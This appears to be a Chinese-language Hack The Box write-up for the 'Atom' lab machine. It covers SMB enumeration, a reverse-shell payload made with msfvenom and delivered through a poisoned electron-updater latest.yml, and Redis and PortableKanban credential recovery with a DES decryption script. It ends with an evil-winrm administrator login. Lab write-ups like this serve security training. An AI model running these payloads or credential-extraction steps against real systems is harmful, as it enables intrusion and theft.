Hackthebox - Atom
靶场信息
data:image/s3,"s3://crabby-images/bf71c/bf71cd5a091ca2fa9200a23496a800b789a35a54" alt=""
靶场类型
data:image/s3,"s3://crabby-images/98832/988327b41161ac182e72399a3476492a8083eb9e" alt=""
信息搜集
Nmap
首先使用NMAP进行端口扫描
data:image/s3,"s3://crabby-images/a28eb/a28eba379ad92f814d19cfdb61b3e781583a74d9" alt=""
Smb
我们可以看到,这台靶场开启了80 135 443 445端口,以及有SMB服务
且SMB服务可以由guest权限登录,那咱们就先看看smb有啥吧
smbclient -L ////10.10.10.237////
密码为空即可
data:image/s3,"s3://crabby-images/71fd3/71fd398723bddbade9245290a78228ed795cc5a5" alt=""
看看我们可以匿名阅读的内容有哪些
smbmap -u 'anonymous' -p '' -H 10.10.10.237
data:image/s3,"s3://crabby-images/2f29e/2f29e6ca0f203b27e7922fce4c34a3abe952c813" alt=""
看来可以匿名读写Software_Updates目录
smbclient [\\\\10.10.10.237\\Software_Updates](file:///////10.10.10.237//Software_Updates)
登录 然后使用dir查看
data:image/s3,"s3://crabby-images/8174e/8174e3ba762811fcface6a0956c7833351d03067" alt=""
看来UAT_Testing_Procedures.pdf文档可以被下载,咱们使用get进行下载
data:image/s3,"s3://crabby-images/c62bd/c62bdeb98a29b92c657f1f47d975401e2d138073" alt=""
data:image/s3,"s3://crabby-images/fa857/fa8578e5d0a7996816de0581c6c971187c7c6482" alt=""
我们可以看到,该文档描述了一个名为Heed的笔记应用,它是一个基于客户端的应用程序,没有与服务器交互。但是它确实通过客户端文件夹进行了更新,我们可以看到已经有三个文件夹了,分别是client1、client2、client3,所以我们接下来访问80端口
data:image/s3,"s3://crabby-images/181ca/181ca012d3ff79ff4d6a5168580c4d24c557517c" alt=""
data:image/s3,"s3://crabby-images/1a550/1a550467dccc6873f20952eea578f24292e90881" alt=""
我们往下翻滚,可以看到一个下载按钮和一个邮箱MrR3boot@atom.htb
既然域名都给了,那还是老规矩,添加hosts吧
vim /etc/hosts
data:image/s3,"s3://crabby-images/e70a3/e70a36ec51b11fb5159737b21c947baf9d8dc253" alt=""
Gobuster
既然都添加了,那目录爆破和子域名爆破就不能少了,爆破吧
gobuster爆破目录
gobuster dir -u "http://10.10.10.237/" -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
data:image/s3,"s3://crabby-images/e7fdf/e7fdf2b63d13c3a80c858e74a71d129e61bf024c" alt=""
gobuster爆破DNS
gobuster dns -d 'atom.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
data:image/s3,"s3://crabby-images/da4a3/da4a3f5c5d96533709e67d2e63c5f37713ff7693" alt=""
简单爆破了一下,好像都没啥有用的东西,那咱们只能去下载了
data:image/s3,"s3://crabby-images/86483/864831d3056c4c38feb754778784ed27653c08b5" alt=""
data:image/s3,"s3://crabby-images/10c42/10c42f0e874f4d24aa433039a4117ad6619ec61f" alt=""
下载下来后是一个exe程序,这就不得不切换一台windows的机器出来了
data:image/s3,"s3://crabby-images/f18ed/f18ed2bbc374dfd8ab8fec864630ea203e7ce358" alt=""
安装好后是酱婶儿的
data:image/s3,"s3://crabby-images/61947/619470fa38cd92ca28d3e092186e32b78e9123e1" alt=""
data:image/s3,"s3://crabby-images/8e730/8e730253f61576171f8491bac59ff68d620ce660" alt=""
这告诉我们这是一个电子应用程序
data:image/s3,"s3://crabby-images/86b64/86b64d6ea74b0e0548c371f22c3865ac2cfc0cf4" alt=""
通过Googles搜索rce程序
data:image/s3,"s3://crabby-images/d684d/d684de9a299dcb3d38eb85c3aa3468a8d7c1e97a" alt=""
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
data:image/s3,"s3://crabby-images/3a279/3a279b54615bd6ae77810ba321cceed6bbc2e44a" alt=""
Juliano Rizzo 这里提到了是由这位大佬发现的漏洞,感谢
data:image/s3,"s3://crabby-images/c75e4/c75e40bc5e37737089d37fa8db15346abc681a52" alt=""
data:image/s3,"s3://crabby-images/df9ea/df9eab5c977c4d8513a504c9b2fac043ca1f06f4" alt=""
这里说它将从latest.yml进行更新
漏洞利用
首先我们生成带有单引号的有效负载
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.184 LPORT=4444 -f exe > "u'payload.exe"
data:image/s3,"s3://crabby-images/c356d/c356d534a8ed0d6cad1f518cbc629de81c8fba91" alt=""
现在我们需要生成一个 sha512 sum hash 并将其转换为十六进制,然后进一步转换为base64
shasum -a 512 "u'payload.exe" | cut -d " " -f1 | xxd -r -p | base64
data:image/s3,"s3://crabby-images/a8fd4/a8fd4506ed441fa2c1a3f3c255100b6aa8adb26d" alt=""
kPA7kwD6QtUcXqDkwnQacg7ZUWGSBiz4oTaWQuxceC7t8SRYcq5T6CBmujUbrHhMVKLJ+RftvSkmpXGFJ1cCMg==
创建latest.yml文件
version: 1.0.1
path: http://10.10.14.184/u'payload.exe
sha512: kPA7kwD6QtUcXqDkwnQacg7ZUWGSBiz4oTaWQuxceC7t8SRYcq5T6CBmujUbrHhMVKLJ+RftvSkmpXGFJ1cCMg==
data:image/s3,"s3://crabby-images/fc607/fc6078d86189f703954a853eea6cf39fa4918300" alt=""
使用python3开启一个http服务器
python3 -m http.server 80
data:image/s3,"s3://crabby-images/8ebc4/8ebc4e5a0517cc6e596654eb8c158d11810d5b38" alt=""
替换掉smb共享中的yml文件
data:image/s3,"s3://crabby-images/bd6a1/bd6a11a7bf204f6704f1c246e2f095c4209708d5" alt=""
data:image/s3,"s3://crabby-images/41599/41599bef0d53a1148de7d8286bd7a3ba02ba90e6" alt=""
data:image/s3,"s3://crabby-images/c2b8b/c2b8b2d351d32a3ce776c5792b9c55ba595df795" alt=""
三个文件夹都要替换
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
使用msfconsole开启监听
data:image/s3,"s3://crabby-images/34be0/34be003ce054810f879e82983d6c680c35bd76b9" alt=""
配置好配置项后exploit执行
data:image/s3,"s3://crabby-images/1651b/1651baf59edf01e0a395c6105c83a5396a7682f4" alt=""
我们可以看到 http服务器里已经收到了GET请求
然后我们再去看看MSF
data:image/s3,"s3://crabby-images/4b081/4b08199ba77421c528fefdb32007b8e4f97181b7" alt=""
已经成功getshell了
如果没有弹回shell,就多尝试几次,或使用1.2.3版本号
权限提升
data:image/s3,"s3://crabby-images/5c256/5c256e466de3f388c49816ec356491a7ff495741" alt=""
为了提权,我先输入了getprivs查看当前用户的权限
输入shell进入shell控制
data:image/s3,"s3://crabby-images/f3acb/f3acbd9e3ab7b1cbb50e63bb80003fc34999fe8f" alt=""
首先进入Program Files目录
data:image/s3,"s3://crabby-images/e00c4/e00c4de28c4781c857f69383e64860dd07cdb54a" alt=""
然后进入Redis目录
data:image/s3,"s3://crabby-images/2218e/2218e79ee95660b1c373be26ea23fd51d6f7e6a8" alt=""
然后我们看到redis的配置文件 redis.windows-service.conf
data:image/s3,"s3://crabby-images/27add/27add1b9687db8998379e2383bf9cb1b80261014" alt=""
我们可以看到,里面有redis cli的密码kidvscat_yes_kidvscat
data:image/s3,"s3://crabby-images/db132/db1326d85c1c04d7e3f337e7d350af7645cb5205" alt=""
然后咱们发现这台靶机的6379端口 也就是redis服务开着呢,那就直接登录吧
data:image/s3,"s3://crabby-images/03061/03061076c162d208cc41cc812480596586801b84" alt=""
登录成功,并使用info进行信息查看
使用keys *列出所有hash
data:image/s3,"s3://crabby-images/fb818/fb818764add50c9da675f792600c08efe73a56d2" alt=""
e8e29158-d70d-44b1-a1ba-4949d52790a0
查看user用户的相关信息
get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
data:image/s3,"s3://crabby-images/95396/9539603578813c31a0a2be26cdecb49dd2ed933a" alt=""
我们得到了一个管理员的hash
Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
data:image/s3,"s3://crabby-images/62c62/62c62a2bb1655ae3062e85a5f95efc8c25af4d38" alt=""
同时我们在用户jason的桌面发现了一个user.txt
成功拿到user权限的flag
data:image/s3,"s3://crabby-images/4186d/4186da3f8700c6fb9df6564ecc88af43b5151e00" alt=""
在检查其他文件的时候,找到了两个文件夹,咱们进去看看
data:image/s3,"s3://crabby-images/5e1cc/5e1cc47c4a95b2891df4ac89f24dbdc7b8375530" alt=""
这里似乎没什么有用的东西,咱们看看另一个文件夹
data:image/s3,"s3://crabby-images/51ed2/51ed222520460f366b82e59223de8e47c45b6e0e" alt=""
这个程序引起了我的兴趣,然后去Google了一下
然后找到了一个exp
data:image/s3,"s3://crabby-images/3f8a4/3f8a441ad39c80c78d0e0f14acd3fdcf3be1f00a" alt=""
data:image/s3,"s3://crabby-images/65319/6531935686aa03069de5924ddb489feddd321e0d" alt=""
可能。。。这就是缘分吧?
data:image/s3,"s3://crabby-images/aa08e/aa08e6338ea980c3db82376a81ad28d3b6d44528" alt=""
咱们查看一下配置文件Portablekanban.cfg
获得了portablekanban的hash值
Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb
这时候开动我们机灵的小脑瓜,动起我们勤劳的小手,小小的修改一下exp
import json
import base64
from des import * #python3 -m pip install des
import sys
def decode(hash):
hash = base64.b64decode(hash.encode('utf-8'))
key = DesKey(b"7ly6UznJ")
return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')
print(decode('Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi'))
data:image/s3,"s3://crabby-images/9e68b/9e68bab847fc36f7d4d581232e2e1e3658195048" alt=""
执行一下这个脚本
data:image/s3,"s3://crabby-images/85f63/85f63000adf888a2e9bc9163adfb65921c7768f0" alt=""
成功得到Administrator的密码kidvscat_admin_@123
data:image/s3,"s3://crabby-images/61fe2/61fe23f19ea526e0dea8754c67553ad7407bcee8" alt=""
我们可以看到5985端口是开启的
别问我怎么知道,因为思路卡壳的我,想了一晚上
NB吗?用头发换的
经过Google,我们发现5985端口是WinRM程序使用的端口
那咱们就根据文档来利用吧
注意,在kali中安装winrm的指令是
gem install evil-winrm
安装好后使用evil-winrm进行登录
evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'
data:image/s3,"s3://crabby-images/70937/7093773c31e45989ba6216efa80f1ef7bc52dce1" alt=""
data:image/s3,"s3://crabby-images/c0ccd/c0ccd624730d945cf7094c03f480fc719c478b16" alt=""
成功拿到root权限的flag
收工睡觉